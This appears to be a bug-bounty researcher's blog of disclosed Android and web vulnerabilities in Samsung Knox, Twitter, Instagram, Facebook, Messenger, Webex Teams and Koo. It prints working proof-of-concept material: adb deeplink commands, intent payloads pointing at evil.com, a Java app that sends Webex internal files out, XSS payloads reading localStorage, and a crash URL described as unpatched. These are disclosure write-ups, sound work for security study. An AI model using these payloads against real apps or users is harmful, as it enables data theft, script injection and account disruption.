Bypass Samsung Knox protection to read files stored in a secure folder | Android

20201230 093332

Description: Samsung Knox is a defensive mobile security platform that is built into Samsung devices and enhances security in all directions through a combination of physical means and software systems, providing security protection from the hardware to the application layer.

I used the path and file structure to bypass Samsung Knox protection in an unauthorized manner to read the stored files in the secure folder, and received a Samsung $3750 reward.

Severity: High | SVE-2020-18025
Continue reading “Bypass Samsung Knox protection to read files stored in a secure folder | Android”

Access Twitter blue features using deeplink without a subscription.

Twitter recently launched Twitter Blue for Android users, allowing them to change the app icon and undo tweets at any time. Twitter Android’s version number is 9.76.0-release.0 has implemented some deeplinks for Twitter subscription to perform direct action, and some of those deeplinks are not being validated or don’t have custom permissions set if the user has a subscription or not, so it is possible to use the change icon, custom navigation, and early access features without a subscription using the below deeplinks:

twitter://subscriptions/settings/extras
twitter://subscriptions/settings/early_access

extras deeplink gives access to change icon and change custom navigation and early_access deeplink gives access to features like undo tweets with custom timing.

Steps To Reproduce:

Launch below deeplink using adb to access app change flow :

adb shell am start -d "twitter://subscriptions/settings/extras"

Launch below deeplink using adb to access undo tweet feature:

adb shell am start -d "twitter://subscriptions/settings/early_access"

Proof of concept:

Instagram vulnerability : Turn off all type of message requests using deeplink (Android)

Instagram Android

Instagram vulnerability description:
In the Instagram for android has messaging tool, users can change message controls to decide whether they want to receive messages from potential connections or other people from Facebook and Instagram.

Instagram’s Android app has implemented a deeplink “instagram://turn_off_message_requests” that can turn off all requests so the user won’t receive messages from anybody, and this deeplink executes headlessly so there is no UI after execution of the deeplink.

Thus, a malicious or rogue app could execute a turn-off message request deeplink without any permission, like “FB_APP_COMMUNICATION” and Attacker could have able to disabled all receiving messages of Instagram user.

Instagram vulnerability

Repro steps :

Instagram android app version: 258.1.0.26.100

1. Goto Instagram for Android > Messages > Tools > Message controls

2. Set “deliver requests to” to “message requests”

3. Close Instagram app

4. Launch “instagram://turn_off_message_requests” deeplink (without quotes)

5. Open Instagram app and goto message controls, you can see all option become “Don’t receive”.

POC:

Timeline:

29/10/2022: Report submitted.

02/11/2022: Triaged

09/11/2022: Bounty

20/12/2022: Fixed

Follow me on Twitter :
https://twitter.com/RahulKankrale

Facebook android vulnerability: Launching internal/tighten deeplink onbehalf of user

In Facebook android, Ad creation deeplink “ads_lwi_coupon_interstitial” has the parameter “landing_page” and uri passed to this param was not being validated so any internal/tightened deeplink passed to it could be launch on “Get Started” button pressed on UI.

Vulnerable deeplink:

fb://ads_lwi_coupon_interstitial/?ad_account_id=1&page_id=&landing_page=fbinternal://rninternalsettings&entry_point=home

Mobile app version: 342.0.0.37.119

Reproduction steps:

  1. Create intent using third party app or html page with deeplink “fb://ads_lwi_coupon_interstitial/?ad_account_id=1&page_id=216662095206780&landing_page=fbinternal://rninternalsettings&entry_point=home”
  2. Launch deeplink/app
  3. Click on “Get Started”
  4. It will open internal settings.

Proof of concept:

Timeline:

31/10/2021: Reported
03/11/2021: Triaged
06/12/2021: Fixed
02/02/2022: Reward $3000 + $225 (Silver Bonus) + $300 (delay bonus)

Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary website 

Facebook Android WebView Vulnerability
Facebook android webview vulnerability:

In Facebook android activity “com.facebook.katana.activity.iap.LaunchFromIAP” is exported with “com.facebook.katana.activity.iap” action intent filter and using “CHECKOUTURL” as Intent extra to loadUrl with validating http/https scheme, which could have potentially been used to send a malicious URL to WebView and execute xss as well as create phishing web page.


Vulnerable Facebook app version: 338.1.0.36.118

Static code analysis:
In LaunchFromIAP webview url loads from bundle “A0I” which is defined in “p000X.C172877z9” as :

public static Bundle A0I(Activity activity) {
return activity.getIntent().getExtras();
}

So LaunchFromIAP activity takes intent extra values and pass to bundle “A0I” and value of bundle access through A0I.getString(“CHECKOUTURL”) in LaunchFromIAP and store in “A02” as string and pass to webview defined in “p000X.C44470KuZ”.


Reproduction:

This issue could be exploited using multiple way:

1.Using any web browser :

<html>
<body>
    <a href="intent:#Intent;action=com.facebook.katana.activity.iap;S.CHECKOUTURL=javascript:alert(8);end">Click here
    </a>
</body>
</html>


2.Using third-party app:

2.1 : Using Action com.facebook.katana.activity.iap

Intent intent = new Intent("com.facebook.katana.activity.iap");
intent.putExtra("CHECKOUTURL", "https://evil.com");
startActivity(intent);

2.2 : Using exported activity

Intent intent = new Intent();
intent.setClassName("com.facebook.work", "com.facebook.katana.activity.iap.LaunchFromIAP");
intent.putExtra("CHECKOUTURL", "javascript:alert(9)");
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
startActivity(intent);

Proof of concept (POC) :

Facebook Android WebView Vulnerability

Timeline:

01/10/2021: Report submitted.

01/10/2021: Triaged.

07/10/2021: Bounty -> $1000 + $75 (Silver league Bonus)
Comment by Facebook :
An untrusted Intent containing a Javascript: URL can cause XSS in LaunchFromIAP. The instance of this bug occurs due to not checking if the scheme is http(s). The larger root cause is that SecureWebView should not by-default handle javascript: URLs in loadURL.”

03/11/2021: Fixed in v342 (It is now validate http/https scheme, host facebook.com and path “/aas/iap_web”

04/01/2022: Requested for disclosure and facebook agreed for disclosure

[IDOR] add or remove the linked publications from Author Publisher settings — Facebook Bug Bounty

Facebook Linked Publications

[IDOR] add or remove the linked publications from Author Publisher settings — Facebook Bug Bounty

Facebook Linked Publications ( Authorship or Author Tag ) feature was designed to give journalists more credit and visibility for the articles they were writing, regardless of where they were being published and it resulted in the byline that you saw in many posts, as well as the ability to easily follow that journalist and see when they shared new articles publicly.

Continue reading “[IDOR] add or remove the linked publications from Author Publisher settings — Facebook Bug Bounty”

Cisco Webex Teams Mobile (Android) Information Disclosure Vulnerability

webexteams
Cisco Webex Teams

A vulnerability in Cisco Webex Teams Mobile (Android) application could allow a local attacker to access to non-sensitive information from an authenticated Webex Teams Mobile user.

The vulnerability is due to improper access handling in the affected software. An attacker could exploit this vulnerability by leveraging the improper access handling through a 3rd party application on an affected device. A successful exploit could allow the attacker to share non-sensitive information to any Webex Spaces the authenticated Webex Teams Mobile (Android) user has access.

Affected Version: This vulnerability affected Cisco Webex Teams Mobile (Android) releases earlier than Release 41.5.1.

The Cisco PSIRT has assigned this bug the following CVSS version 3.1 score. The Base CVSS score as of the time of evaluation is 3.3

Acknowledgement by Cisco:

https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvx83611

Vulnerability Description: 

Webex teams app has exported com.webex.teams.crosslaunch.message activity and it has associated with sharing fragment to share content with space or one2one using some parameters and action like android.intent.extra.STREAM and android.intent.action.SEND.

So any third-party app could have used those params to perform sharing content because app was failed to validate path and file before sharing content for permission.

Step to reproduce:

  • Create android app using below code snippet:
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.os.StrictMode;
public class MainActivity extends AppCompatActivity {
  @Override
  protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);
    StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();
    StrictMode.setVmPolicy(builder.build());
    Uri uri = Uri.parse("file:///data/data/com.cisco.wx2.android/shared_prefs/com.cisco.wx2.android_preferences.xml");
    Intent intent = new Intent("android.intent.action.SEND");
    intent.setClassName("com.cisco.wx2.android", "com.webex.teams.crosslaunch.message");
    intent.putExtra("android.intent.extra.STREAM", uri);
    intent.setType("");
    startActivity(intent);
  }
}
  • Once created run this app on the device where webex teams installed.
  • Run the created app then it will open Webex Teams app with Messaging window to select target, now select target user, here app will attach com.cisco.wx2.android_preferences.xml file to be send.
  • Click on send button, it will send attached internal file to target user, this also allows access to  data/data/com.cisco.wx2.android/* so all files in apps data including databases could be steal.

Proof of Concept:
Download Video : https://drive.google.com/file/d/1SXElqWb9aFdUEuqjxilRsNCv5PB1mIDv/view?usp=sharing

Or Please Watch in HD :

Watch in HD

Note: This vulnerability requires a user to be logged into the Teams app and only non-sensitive info (some app, OS settings, and cached images) can be shared to other Webex spaces.  All sensitive information is encrypted, So no CVE was assigned.

Crash Instagram Bug (Android) using U+043E (Unpatched)

crash instagram bug

Instagram for android does not handle some CYRILLIC letters like U+043E : CYRILLIC SMALL LETTER O so if we create hostname using Cyrillic small letter о like the it could crash instagram:

http://gооgle.com/

copy above url and post this url in instagram profile or send it to user in chat .

To try this Goto my instagram https://instagram.com/rahulkankrale

and click on google.com

Instagram will get crashed with exception:

crash instagram bug

Video for proof of concept:

Using this bug malicious user could crash instagram live by sending this url to host.

I didn’t reported this as no security impact because of user interaction.

Koo App Vulnerability : Stored XSS (Cloudflare bypass)

Koo App

XSS vulnerability found in Koo App: Koo is a Bengaluru-based microblogging mobile application with 5 million users which is known to be an Indian alternative to Twitter. Koo app allows users to connect, engage and interact in 13 regional languages such as Bengali, Telugu, Punjabi, Kannada, Hindi among several others. The application was an instant hit because of its vast language options as untapped user base in India which is not English speaking or want a platform to engage in their local language, has a lot of potential.

Description: Stored XSS, also known as persistent XSS is more damaging than non-persistent XSS. It occurs when a malicious script is injected directly into a vulnerable web application.

Steps To Reproduce Koo App XSS:

1. Goto https://kooapp.com and login

2. Then create koo and put xss encoded payload: %3Csvg%20onx%3D%28%29%20onload%3D%28confirm%29%28JSON.stringify%28localStorage%29%29%3E

3. Post koo

Now anybody who visit this koo then xss gets triggered.

POC:

Another endpoint was vulnerable :

Reflected XSS in hashtag feature:

https://www.kooapp.com/tag/n%3C%2ftitle%3E%3Csvg%20onx%3D%28%29%20onload%3D%28confirm%29%28%2FXSS_By_RahulKankrale%2F%29%3E

Both issue has been resolved.

Note: It is still vulnerable for html injection.

Facebook Messenger for android indirect thread deletion vulnerability.

Whatsapp Copy 2 e1618729194930 768x409 1

Description:

Facebook Messenger for Android reuses the Thread ID when invoked via deeplink which could have led attacker to produce indirect thread deletion vulnerability.

This can lead to some confusing behaviour on the user-side, one example being: The user has a 1:1 with the attacker. The attacker then forces the user to create a new Group Chat with the same Thread ID that is not functional. If the user deletes the chat, the original chat with the attacker also disappears.

So attacker could use this method to delete thread between victim and his friend as well as delete chats from victims messenger as victim not able to left duplicate group thread so he has only option to delete conversation.

Deeplink used : fb-messenger://groupthreadfbid/%sFor automatic redirection using webpage :

Repro steps :

Messenger App version (Android) : 274.0.0.18.120

create webpage with script (replace userID with your userID) , host it:

<script>function trigger(){document.location="fb-messenger://groupthreadfbid/100000505765955";}setTimeout(trigger, 1000);</script>

1. Send Crafted webpage link created from script to user with whom you previously interacted.

2. On victims phone click on that link, it will open blank page and redirect back to thread

3. Send message to victim or when victim close app and reopen, duplicate thread id will be created between you and victim in victims phone.

4. Now if victim sends a message then it will shows in both thread.

5. Victim goes to duplicate thread(group thread) and tab on members and tab on admin, here he can see No admin.

6. Now if he try to left that group, he will get error so victim have only one option left with him that delete duplicate thread which is group thread.

7. Once victim Deletes duplicate thread by selecting “delete conversation” and then original thread also got deleted, this deletion is permanent as from thread would not visible in web after deletion.

Timeline:

27/07/2020: Report submitted.

29/07/2020: FB managed to reproduce.

03/08/2020: Triaged

03/09/2020: Fixed

10/09/2020: Bounty

POC:

Facebook Messenger for android indirect thread deletion vulnerability.

Follow me on Twitter :